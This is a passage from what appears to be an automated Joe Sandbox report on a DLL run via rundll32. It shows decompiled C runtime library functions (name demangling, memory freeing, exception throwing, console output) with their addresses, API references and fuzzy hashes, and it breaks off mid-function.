Instruction Fuzzy Hash: 43B17D7590121A9FDB64DF18D988AADB3F4FF08345F9145AAE80AA7350D731AE90CF44

Uniqueness

Uniqueness Score: -1.00%

Function 10008AEA, Relevance: 10.7, APIs: 7, Instructions: 151
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 87%

			E10008AEA(void* __ebx, intOrPtr* _a4, intOrPtr* _a8) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				char _v28;
				char _v36;
				char _v44;
				char* _t50;
				void* _t54;
				intOrPtr* _t57;
				void* _t62;
				intOrPtr* _t68;
				intOrPtr* _t69;
				char* _t73;
				void* _t77;
				void* _t78;
				intOrPtr* _t83;
				char* _t88;
				intOrPtr* _t104;
				void* _t108;
				void* _t113;
				char _t115;
				void* _t118;
				void* _t119;
				void* _t123;

				_t50 =  *0x1004e004; // 0x0
				_t119 = _t118 - 0x28;
				if( *_t50 == 0) {
					_t51 = _a8;
					_t115 = 0;
					if( *_a8 == 0) {
						goto L16;
					} else {
						_v28 = ")[";
						_v24 = 2;
						_t54 = E1000770C(E10007684(E10007637(_t85,  &_v44, 0x28, _t51),  &_v36,  &_v28),  &_v20, 1);
						_t88 =  &_v12;
						goto L17;
					}
					L21:
				} else {
					_t113 = E1000AAAD();
					_t123 = _t113;
					if(_t123 < 0 || _t123 == 0) {
						_t115 = 0;
						L16:
						_v12 = _t115;
						_v8 = _t115;
						E10008798( &_v12, 0x5b);
						_t54 = E1000770C( &_v12,  &_v44, 1);
						_t88 =  &_v36;
						L17:
						E10008D42(_a4, E100076C8(_t54, _t88, 0x5d));
						_t57 = _a4;
					} else {
						_t83 = _a8;
						_v12 = 0;
						_v8 = 0;
						if(( *(_t83 + 4) & 0x00000800) == 0) {
							L5:
							_t62 = _t113;
							_t113 = _t113 - 1;
							if(_t62 != 0) {
								_t73 =  *0x1004e004; // 0x0
								if( *_t73 != 0) {
									_t77 = E10007637(_t85,  &_v36, 0x5b, E10009E08(_t108,  &_v20, 0));
									_t119 = _t119 + 0x14;
									_t78 = E100076C8(_t77,  &_v44, 0x5d);
									_t85 =  &_v12;
									E100077A0( &_v12, _t78);
									goto L8;
								}
							}
						} else {
							_v20 = 0x10042dd4;
							_t85 =  &_v12;
							_v16 = 2;
							E10007748( &_v12,  &_v20);
							L8:
							if(_v8 <= 1) {
								goto L5;
							}
						}
						if( *_t83 != 0) {
							if(( *(_t83 + 4) & 0x00000800) == 0) {
								_t68 = E100076C8(E10007637(_t85,  &_v44, 0x28, _t83),  &_v36, 0x29);
								_push( &_v12);
								_push( &_v20);
								_t104 = _t68;
							} else {
								_t104 = _t83;
								_push( &_v12);
								_push( &_v44);
							}
							_t69 = E100076A6(_t104);
							_v12 =  *_t69;
							_v8 =  *((intOrPtr*)(_t69 + 4));
						}
						E1000B1EA(_t83,  &_v28,  &_v12);
						_t57 = _a4;
						 *_t57 = _v28;
						 *(_t57 + 4) = _v24 | 0x00000800;
					}
				}
				return _t57;
				goto L21;
			}

0x10008aed
0x10008af2
0x10008afa
0x10008c40
0x10008c43
0x10008c47
0x00000000
0x10008c49
0x10008c4d
0x10008c57
0x10008c7d
0x10008c82
0x00000000
0x10008c82
0x00000000
0x10008b00
0x10008b05
0x10008b07
0x10008b09
0x10008c01
0x10008c03
0x10008c08
0x10008c0b
0x10008c0e
0x10008c1c
0x10008c21
0x10008c24
0x10008c32
0x10008c37
0x10008b15
0x10008b16
0x10008b1b
0x10008b1e
0x10008b28
0x10008b46
0x10008b46
0x10008b48
0x10008b4b
0x10008b4d
0x10008b55
0x10008b68
0x10008b6d
0x10008b78
0x10008b7e
0x10008b81
0x00000000
0x10008b81
0x10008b55
0x10008b2a
0x10008b2d
0x10008b35
0x10008b38
0x10008b3f
0x10008b86
0x10008b8a
0x00000000
0x00000000
0x10008b8a
0x10008b8e
0x10008b97
0x10008bbc
0x10008bc4
0x10008bc8
0x10008bc9
0x10008b99
0x10008b9c
0x10008b9e
0x10008ba2
0x10008ba2
0x10008bcb
0x10008bd2
0x10008bd8
0x10008bd8
0x10008be3
0x10008be8
0x10008bf9
0x10008bfb
0x10008bfe
0x10008b09
0x10008c3f
0x00000000

APIs

DName::operator+.LIBCMT ref: 10008B78
DName::operator+.LIBCMT ref: 10008BCB

Part of subcall function 10007748: shared_ptr.LIBCMT ref: 10007764

Part of subcall function 10007637: DName::operator+.LIBCMT ref: 10007658

DName::operator+.LIBCMT ref: 10008BBC
DName::operator+.LIBCMT ref: 10008C1C
DName::operator+.LIBCMT ref: 10008C29
DName::operator+.LIBCMT ref: 10008C70
DName::operator+.LIBCMT ref: 10008C7D

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Name::operator+$shared_ptr
String ID:
API String ID: 1037112749-0
Opcode ID: c8cb4e4b3be6c4ee29983329df1be7be1792c1402584c21628f1be7317d469b5
Instruction ID: 0dbcc1bb4ee46c20ec2d03185912c156ee3fc1c0119f9f9dc31a411e659c0aa6
Opcode Fuzzy Hash: c8cb4e4b3be6c4ee29983329df1be7be1792c1402584c21628f1be7317d469b5
Instruction Fuzzy Hash: 775186B5D04218AFEB05CB94C895EEEBBF8FF08390F044159F546A7185DB75AB44CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10009E08, Relevance: 10.6, APIs: 7, Instructions: 102
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 42%

			E10009E08(void* __edx, intOrPtr* _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				intOrPtr _v40;
				char _v44;
				void* __ebx;
				intOrPtr _t24;
				char* _t27;
				intOrPtr* _t28;
				intOrPtr* _t29;
				void* _t30;
				intOrPtr _t33;
				char _t38;
				intOrPtr* _t40;
				char _t42;
				char* _t45;
				char* _t46;
				void* _t55;
				intOrPtr* _t56;

				_t55 = __edx;
				_t40 =  *0x1004e004; // 0x0
				_t38 = 0;
				if( *_t40 == 0x51) {
					_t38 = 1;
					_t40 = _t40 + 1;
					 *0x1004e004 = _t40;
				}
				_t24 =  *_t40;
				if(_t24 != 0) {
					if(_t24 < 0x30 || _t24 > 0x39) {
						E1000CBF0(_t40,  &_v44);
						if(_v36 == 0) {
							_t27 =  *0x1004e004; // 0x0
							if( *_t27 != 0) {
								_t42 = 0;
								_v8 = 2;
								_v12 = 0;
								_t56 =  &_v12;
							} else {
								_t29 = E100072DE( &_v36, 1);
								goto L22;
							}
						} else {
							_push(_v40);
							 *0x1004e004 =  *0x1004e004 + 1;
							_push(_v44);
							if(_a8 == 0) {
								if(_t38 == 0) {
									_t45 =  &_v20;
									goto L11;
								} else {
									_t46 =  &_v36;
									goto L8;
								}
							} else {
								if(_t38 == 0) {
									_t29 = E10007328(_t38,  &_v20);
									goto L22;
								} else {
									_t30 = E10007328(_t38,  &_v36);
									goto L9;
								}
							}
							goto L23;
						}
					} else {
						_t33 = _t24;
						if(_t38 == 0) {
							asm("cdq");
							asm("adc edx, 0xffffffff");
							_push(_t55);
							 *0x1004e004 = _t40 + 1;
							_t45 =  &_v36;
							_push(_t33 + 0xffffffd1);
							L11:
							_t29 = E100073B4(_t45);
							L22:
							_t56 = _t29;
						} else {
							asm("cdq");
							_push(_t55);
							 *0x1004e004 = _t40 + 1;
							_t46 =  &_v20;
							_push(_t33 - 0x2f);
							L8:
							_t30 = E100073B4(_t46);
							L9:
							E100076A6(E1000723E( &_v28, 0x1004d070),  &_v12, _t30);
							_t56 =  &_v12;
						}
						L23:
						_t42 =  *_t56;
					}
					_t28 = _a4;
					 *_t28 = _t42;
					_t22 = _t56 + 4; // 0x40001004
					 *((intOrPtr*)(_t28 + 4)) =  *_t22;
				} else {
					E100072DE(_a4, 1);
					_t28 = _a4;
				}
				return _t28;
			}

0x10009e08
0x10009e0b
0x10009e15
0x10009e1a
0x10009e1c
0x10009e1e
0x10009e1f
0x10009e1f
0x10009e25
0x10009e29
0x10009e40
0x10009ea0
0x10009eaa
0x10009ee7
0x10009eef
0x10009f01
0x10009f03
0x10009f0a
0x10009f0d
0x10009ef1
0x10009ef6
0x00000000
0x10009ef6
0x10009eac
0x10009eac
0x10009eaf
0x10009eb9
0x10009ebc
0x10009ed8
0x10009ee2
0x00000000
0x10009eda
0x10009eda
0x00000000
0x10009eda
0x10009ebe
0x10009ec0
0x10009ecf
0x00000000
0x10009ec2
0x10009ec5
0x00000000
0x10009ec5
0x10009ec0
0x00000000
0x10009ebc
0x10009e46
0x10009e46
0x10009e4b
0x10009e82
0x10009e86
0x10009e8a
0x10009e8b
0x10009e91
0x10009e94
0x10009e95
0x10009e95
0x10009efb
0x10009efb
0x10009e4d
0x10009e51
0x10009e52
0x10009e53
0x10009e59
0x10009e5c
0x10009e5d
0x10009e5d
0x10009e62
0x10009e78
0x10009e7d
0x10009e7d
0x10009efd
0x10009efd
0x10009efd
0x10009f10
0x10009f14
0x10009f16
0x10009f19
0x10009e2b
0x10009e30
0x10009e35
0x10009e35
0x10009f1e

APIs

DName::DName.LIBVCRUNTIME ref: 10009E30
DName::DName.LIBVCRUNTIME ref: 10009E5D

Part of subcall function 100073B4: __aulldvrm.LIBCMT ref: 100073E5

DName::operator+.LIBCMT ref: 10009E78
DName::DName.LIBVCRUNTIME ref: 10009E95
DName::DName.LIBVCRUNTIME ref: 10009EC5
DName::DName.LIBVCRUNTIME ref: 10009ECF
DName::DName.LIBVCRUNTIME ref: 10009EF6

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: NameName::$Name::operator+__aulldvrm
String ID:
API String ID: 4069495278-0
Opcode ID: c2653dc1151c0b8f23c99d4576837361905e921933427748eb52f378f376a92a
Instruction ID: 0ead771c213622766d894edfd69fa415a0cbe9b7da6d14d4204ba7d65ba76e3a
Opcode Fuzzy Hash: c2653dc1151c0b8f23c99d4576837361905e921933427748eb52f378f376a92a
Instruction Fuzzy Hash: E731F471D042849AFF08CFA4CD91BED7BB5FF09380F104059E959A729ADB746D85CB14

Uniqueness

Uniqueness Score: -1.00%

Function 1000A460, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E1000A460(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				long _v76;
				char _v80;
				long long _v84;
				char _v92;
				char _v96;
				void* _v100;
				void* __ebp;
				signed int _t24;
				intOrPtr _t26;
				char* _t29;
				intOrPtr* _t30;
				intOrPtr* _t44;
				void* _t45;
				long long _t46;
				intOrPtr* _t55;
				signed int _t56;
				long long* _t57;
				long long _t61;

				_t54 = __edx;
				_t24 =  *0x1004d054; // 0x944e5696
				_v8 = _t24 ^ _t56;
				_t44 =  *0x1004e004; // 0x0
				_t55 = _a4;
				_t26 =  *_t44;
				if(_t26 != 0) {
					if(_t26 < 0x30 || _t26 > 0x39) {
						E1000CBF0(_t44,  &_v100);
						_pop(_t45);
						if(_v92 == 0) {
							L11:
							_t29 =  *0x1004e004; // 0x0
							if( *_t29 != 0) {
								_t46 = 0;
								_v80 = 2;
								_v84 = 0;
								_t30 =  &_v84;
							} else {
								_t30 = E100072DE( &_v84, 1);
								_t46 =  *_t30;
							}
							 *_t55 = _t46;
							 *((intOrPtr*)(_t55 + 4)) =  *((intOrPtr*)(_t30 + 4));
						} else {
							_v84 = _v100;
							_v80 = _v96;
							if(_a8 != 0x42) {
								if(_a8 != 0x41) {
									goto L11;
								} else {
									_t61 = _v84;
									goto L8;
								}
							} else {
								_t61 = _v84;
								L8:
								 *_t57 = _t61;
								swprintf( &_v76, 0x41, "%lf", _t45, _t45);
								_v80 = 0;
								_push(_v80);
								E10006DC1(_t55,  &_v76);
							}
						}
					} else {
						asm("cdq");
						 *0x1004e004 = _t44 + 1;
						E100073B4(_t55, _t26 - 0x2f, __edx);
					}
				} else {
					E100072DE(_t55, 1);
				}
				return E100037EA(_t55, _v8 ^ _t56, _t54);
			}

0x1000a460
0x1000a466
0x1000a46d
0x1000a470
0x1000a477
0x1000a47a
0x1000a47e
0x1000a490
0x1000a4b6
0x1000a4bf
0x1000a4c0
0x1000a50e
0x1000a50e
0x1000a516
0x1000a526
0x1000a528
0x1000a52f
0x1000a532
0x1000a518
0x1000a51d
0x1000a522
0x1000a522
0x1000a535
0x1000a53a
0x1000a4c2
0x1000a4c9
0x1000a4cf
0x1000a4d2
0x1000a507
0x00000000
0x1000a509
0x1000a509
0x00000000
0x1000a509
0x1000a4d4
0x1000a4d4
0x1000a4d7
0x1000a4d9
0x1000a4e7
0x1000a4ef
0x1000a4f8
0x1000a4fc
0x1000a4fc
0x1000a4d2
0x1000a496
0x1000a49d
0x1000a49f
0x1000a4a8
0x1000a4a8
0x1000a480
0x1000a484
0x1000a484
0x1000a54b

APIs

DName::DName.LIBVCRUNTIME ref: 1000A484
DName::DName.LIBVCRUNTIME ref: 1000A4A8

Strings

A, xrefs: 1000A503
%lf, xrefs: 1000A4DC

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: NameName::
String ID: %lf$A
API String ID: 1333004437-43661536
Opcode ID: 09a75fdd47e4acb5447cdab9d691237d5dc8450d4975c5c861bb3ef48e028a29
Instruction ID: 1a9286bd75de71b3adf91c9212a77dd4288feb1749d5defe6a7f402daddab9a2
Opcode Fuzzy Hash: 09a75fdd47e4acb5447cdab9d691237d5dc8450d4975c5c861bb3ef48e028a29
Instruction Fuzzy Hash: 7E31CEB5E042589BEF24CFA4DD45ADDBBB4FF0A380F10415EE8459B249C7B4A981CB05

Uniqueness

Uniqueness Score: -1.00%

Function 1002F7C8, Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1002F7C8(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E1002F497(_t45, 7);
					E1002F497(_t45 + 0x1c, 7);
					E1002F497(_t45 + 0x38, 0xc);
					E1002F497(_t45 + 0x68, 0xc);
					E1002F497(_t45 + 0x98, 2);
					E100268B3( *((intOrPtr*)(_t45 + 0xa0)));
					E100268B3( *((intOrPtr*)(_t45 + 0xa4)));
					E100268B3( *((intOrPtr*)(_t45 + 0xa8)));
					E1002F497(_t45 + 0xb4, 7);
					E1002F497(_t45 + 0xd0, 7);
					E1002F497(_t45 + 0xec, 0xc);
					E1002F497(_t45 + 0x11c, 0xc);
					E1002F497(_t45 + 0x14c, 2);
					E100268B3( *((intOrPtr*)(_t45 + 0x154)));
					E100268B3( *((intOrPtr*)(_t45 + 0x158)));
					E100268B3( *((intOrPtr*)(_t45 + 0x15c)));
					return E100268B3( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x1002f7ce
0x1002f7d3
0x1002f7dc
0x1002f7e7
0x1002f7f2
0x1002f7fd
0x1002f80b
0x1002f816
0x1002f821
0x1002f82c
0x1002f83a
0x1002f848
0x1002f859
0x1002f867
0x1002f875
0x1002f880
0x1002f88b
0x1002f896
0x00000000
0x1002f8a6
0x1002f8ab

APIs

Part of subcall function 1002F497: _free.LIBCMT ref: 1002F4BC

_free.LIBCMT ref: 1002F816

Part of subcall function 100268B3: HeapFree.KERNEL32(00000000,00000000), ref: 100268C9
Part of subcall function 100268B3: GetLastError.KERNEL32(?,?,1002F4C1,?,00000000,?,00000000,?,1002F7E1,?,00000007,?,?,1002E30A,?,?), ref: 100268DB

_free.LIBCMT ref: 1002F821
_free.LIBCMT ref: 1002F82C
_free.LIBCMT ref: 1002F880
_free.LIBCMT ref: 1002F88B
_free.LIBCMT ref: 1002F896
_free.LIBCMT ref: 1002F8A1

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b6a4d705080cccdd2f01c69a37c813b959a5eb3b3a4044ec5a65d09ed6793608
Instruction ID: de5a865e1f82c24ee5e8fa7fff2b21cb884519308ee5bc5c1053497f94fa0323
Opcode Fuzzy Hash: b6a4d705080cccdd2f01c69a37c813b959a5eb3b3a4044ec5a65d09ed6793608
Instruction Fuzzy Hash: F511DA75640B08AAE620EBF0ED47FEB7B9CEF04740F804D3DB699A6152DBA9B5048750

Uniqueness

Uniqueness Score: -1.00%

Function 1000337C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E1000337C(intOrPtr _a4) {
				char _v16;
				intOrPtr _v24;
				char _v44;
				intOrPtr _v52;
				char _v72;
				intOrPtr _v80;
				char _v104;
				intOrPtr _v112;
				char _v132;
				void* _t43;
				void* _t44;
				void* _t45;

				_t44 = _t43 - 0xc;
				E10002F08( &_v16, _a4);
				E10004C0B( &_v16, 0x1004ad80);
				asm("int3");
				_push(_t43);
				_t45 = _t44 - 0xc;
				E10002F7C( &_v44, _v24);
				E10004C0B( &_v44, 0x1004adbc);
				asm("int3");
				_push(_t44);
				E10002FB6( &_v72, _v52);
				E10004C0B( &_v72, 0x1004adf8);
				asm("int3");
				_push(_t45);
				E10002FF9( &_v104, _v80);
				E10004C0B( &_v104, 0x1004ae88);
				asm("int3");
				_push(_t45 - 0xc);
				E10003042( &_v132, _v112);
				E10004C0B( &_v132, 0x1004ae34);
				asm("int3");
				return "bad function call";
			}

0x1000337f
0x10003388
0x10003396
0x1000339b
0x1000339c
0x1000339f
0x100033a8
0x100033b6
0x100033bb
0x100033bc
0x100033c8
0x100033d6
0x100033db
0x100033dc
0x100033e8
0x100033f6
0x100033fb
0x100033fc
0x10003408
0x10003416
0x1000341b
0x10003421

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 10003388

Part of subcall function 10002F08: std::exception::exception.LIBCONCRT ref: 10002F15

Part of subcall function 10004C0B: RaiseException.KERNEL32(E06D7363,00000001,00000003,10003CFA,?,?,?,10003CFA,?,1004AC7C), ref: 10004C6B

std::invalid_argument::invalid_argument.LIBCONCRT ref: 100033A8

Part of subcall function 10002F7C: std::exception::exception.LIBCONCRT ref: 10002F89

std::invalid_argument::invalid_argument.LIBCONCRT ref: 100033C8

Part of subcall function 10002FB6: std::exception::exception.LIBCONCRT ref: 10002FC3

std::regex_error::regex_error.LIBCPMT ref: 100033E8

Part of subcall function 10002FF9: std::exception::exception.LIBCONCRT ref: 10003011

std::invalid_argument::invalid_argument.LIBCONCRT ref: 10003408

Part of subcall function 10003042: std::exception::exception.LIBCONCRT ref: 1000304F

Strings

bad function call, xrefs: 1000341C

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: std::exception::exception$std::invalid_argument::invalid_argument$ExceptionRaisestd::regex_error::regex_error
String ID: bad function call
API String ID: 2470674941-3612616537
Opcode ID: 346c17465034ca6be7bf942654ed0d14118ffd4f0e314fec286e0fdce0ccf1d8
Instruction ID: 9a04ec3b8265f418b22985a109fb5f94b6ecf92577c3c0eff2a7a32c9cb980e7
Opcode Fuzzy Hash: 346c17465034ca6be7bf942654ed0d14118ffd4f0e314fec286e0fdce0ccf1d8
Instruction Fuzzy Hash: 3E11B77DC0410CBBEB04EAE4DC46CDD777DEF04180F904474BA2592456FB74BA5986D9

Uniqueness

Uniqueness Score: -1.00%

Function 1003265D, Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E1003265D(void* __eflags, intOrPtr _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				signed char _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v51;
				void _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed int _v84;
				signed int _v88;
				long _v92;
				intOrPtr _v96;
				long _v100;
				signed char* _v104;
				signed char* _v108;
				void* _v112;
				intOrPtr _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebp;
				signed int _t170;
				signed int _t172;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				signed char* _t202;
				void* _t206;
				struct _OVERLAPPED* _t211;
				void* _t220;
				long _t224;
				intOrPtr _t225;
				char _t227;
				void* _t237;
				struct _OVERLAPPED* _t241;
				signed int _t243;
				intOrPtr _t246;
				signed int _t249;
				signed int _t250;
				signed int _t252;
				intOrPtr _t254;
				void* _t260;
				intOrPtr _t261;
				signed int _t262;
				signed char _t265;
				intOrPtr _t268;
				signed char* _t270;
				signed int _t273;
				signed int _t274;
				signed int _t278;
				signed int _t279;
				intOrPtr _t280;
				signed int _t281;
				struct _OVERLAPPED* _t283;
				struct _OVERLAPPED* _t285;
				signed int _t286;
				void* _t287;
				void* _t288;

				_t170 =  *0x1004d054; // 0x944e5696
				_v8 = _t170 ^ _t286;
				_t172 = _a8;
				_t265 = _t172 >> 6;
				_t243 = (_t172 & 0x0000003f) * 0x38;
				_t270 = _a12;
				_v108 = _t270;
				_v80 = _t265;
				_v112 =  *((intOrPtr*)(_t243 +  *((intOrPtr*)(0x1004e628 + _t265 * 4)) + 0x18));
				_v44 = _t243;
				_v96 = _a16 + _t270;
				_t178 = GetConsoleOutputCP();
				_t241 = 0;
				_v124 = _t178;
				E1000F794( &_v72, _t265, 0);
				_t274 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_t246 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t246;
				_v104 = _t270;
				if(_t270 >= _v96) {
					L48:
					__eflags = _v60 - _t241;
				} else {
					while(1) {
						_t249 = _v44;
						_v51 =  *_t270;
						_v76 = _t241;
						_v40 = 1;
						_t186 =  *((intOrPtr*)(0x1004e628 + _v80 * 4));
						_v48 = _t186;
						if(_t246 != 0xfde9) {
							goto L19;
						}
						_t211 = _t241;
						_t268 = _v48 + 0x2e + _t249;
						_v116 = _t268;
						while( *((intOrPtr*)(_t268 + _t211)) != _t241) {
							_t211 =  &(_t211->Internal);
							if(_t211 < 5) {
								continue;
							}
							break;
						}
						_t265 = _v96 - _t270;
						_v40 = _t211;
						if(_t211 <= 0) {
							_t72 = ( *_t270 & 0x000000ff) + 0x1004d7f0; // 0x0
							_t254 =  *_t72 + 1;
							_v48 = _t254;
							__eflags = _t254 - _t265;
							if(_t254 > _t265) {
								__eflags = _t265;
								if(_t265 <= 0) {
									goto L40;
								} else {
									_t279 = _v44;
									do {
										 *((char*)( *((intOrPtr*)(0x1004e628 + _v80 * 4)) + _t279 + _t241 + 0x2e)) =  *((intOrPtr*)(_t241 + _t270));
										_t241 =  &(_t241->Internal);
										__eflags = _t241 - _t265;
									} while (_t241 < _t265);
									goto L39;
								}
							} else {
								_v144 = _t241;
								__eflags = _t254 - 4;
								_v140 = _t241;
								_v56 = _t270;
								_v40 = (_t254 == 4) + 1;
								_t220 = E1003356D( &_v144,  &_v76,  &_v56, (_t254 == 4) + 1,  &_v144);
								_t288 = _t287 + 0x10;
								__eflags = _t220 - 0xffffffff;
								if(_t220 == 0xffffffff) {
									goto L48;
								} else {
									_t280 = _v48;
									goto L18;
								}
							}
						} else {
							_t224 =  *((char*)(( *(_t249 + _v48 + 0x2e) & 0x000000ff) + 0x1004d7f0)) + 1;
							_v56 = _t224;
							_t225 = _t224 - _v40;
							_v48 = _t225;
							if(_t225 > _t265) {
								__eflags = _t265;
								if(_t265 > 0) {
									_t281 = _t249;
									do {
										_t227 =  *((intOrPtr*)(_t241 + _t270));
										_t260 =  *((intOrPtr*)(0x1004e628 + _v80 * 4)) + _t281 + _t241;
										_t241 =  &(_t241->Internal);
										 *((char*)(_t260 + _v40 + 0x2e)) = _t227;
										_t281 = _v44;
										__eflags = _t241 - _t265;
									} while (_t241 < _t265);
									L39:
									_t274 = _v88;
								}
								L40:
								_t278 = _t274 + _t265;
								__eflags = _t278;
								L41:
								__eflags = _v60;
								_v88 = _t278;
							} else {
								_t265 = _v40;
								_t283 = _t241;
								_t261 = _v116;
								do {
									 *((char*)(_t286 + _t283 - 0xc)) =  *((intOrPtr*)(_t261 + _t283));
									_t283 =  &(_t283->Internal);
								} while (_t283 < _t265);
								_t284 = _v48;
								_t262 = _v44;
								if(_v48 > 0) {
									E100045C0( &_v16 + _t265, _t270, _t284);
									_t262 = _v44;
									_t287 = _t287 + 0xc;
									_t265 = _v40;
								}
								_t273 = _v80;
								_t285 = _t241;
								do {
									 *( *((intOrPtr*)(0x1004e628 + _t273 * 4)) + _t262 + _t285 + 0x2e) = _t241;
									_t285 =  &(_t285->Internal);
								} while (_t285 < _t265);
								_t270 = _v104;
								_t280 = _v48;
								_v120 =  &_v16;
								_v136 = _t241;
								_v132 = _t241;
								_v40 = (_v56 == 4) + 1;
								_t237 = E1003356D( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
								_t288 = _t287 + 0x10;
								if(_t237 == 0xffffffff) {
									goto L48;
								} else {
									L18:
									_t270 = _t270 - 1 + _t280;
									L27:
									_t270 =  &(_t270[1]);
									_v104 = _t270;
									_t193 = E10028BDD(_v124, _t241,  &_v76, _v40,  &_v32, 5, _t241, _t241);
									_t287 = _t288 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L48;
									} else {
										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t241) == 0) {
											L47:
											_v92 = GetLastError();
											goto L48;
										} else {
											_t274 = _v84 - _v108 + _t270;
											_v88 = _t274;
											if(_v100 < _v56) {
												goto L48;
											} else {
												if(_v51 != 0xa) {
													L34:
													if(_t270 >= _v96) {
														goto L48;
													} else {
														_t246 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v52 = _t198;
													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t241) == 0) {
														goto L47;
													} else {
														if(_v100 < 1) {
															goto L48;
														} else {
															_v84 = _v84 + 1;
															_t274 = _t274 + 1;
															_v88 = _t274;
															goto L34;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L49;
						L19:
						_t265 =  *((intOrPtr*)(_t249 + _t186 + 0x2d));
						__eflags = _t265 & 0x00000004;
						if((_t265 & 0x00000004) == 0) {
							_v33 =  *_t270;
							_t188 = E10024262(_t265);
							_t250 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t250 * 2)) - _t241;
							if( *((intOrPtr*)(_t188 + _t250 * 2)) >= _t241) {
								_push(1);
								_push(_t270);
								goto L26;
							} else {
								_t100 =  &(_t270[1]); // 0x1
								_t202 = _t100;
								_v56 = _t202;
								__eflags = _t202 - _v96;
								if(_t202 >= _v96) {
									_t265 = _v80;
									_t252 = _v44;
									 *((char*)(_t252 +  *((intOrPtr*)(0x1004e628 + _t265 * 4)) + 0x2e)) = _v33;
									 *(_t252 +  *((intOrPtr*)(0x1004e628 + _t265 * 4)) + 0x2d) =  *(_t252 +  *((intOrPtr*)(0x1004e628 + _t265 * 4)) + 0x2d) | 0x00000004;
									_t278 = _t274 + 1;
									goto L41;
								} else {
									_t206 = E1002C39D( &_v76, _t270, 2);
									_t288 = _t287 + 0xc;
									__eflags = _t206 - 0xffffffff;
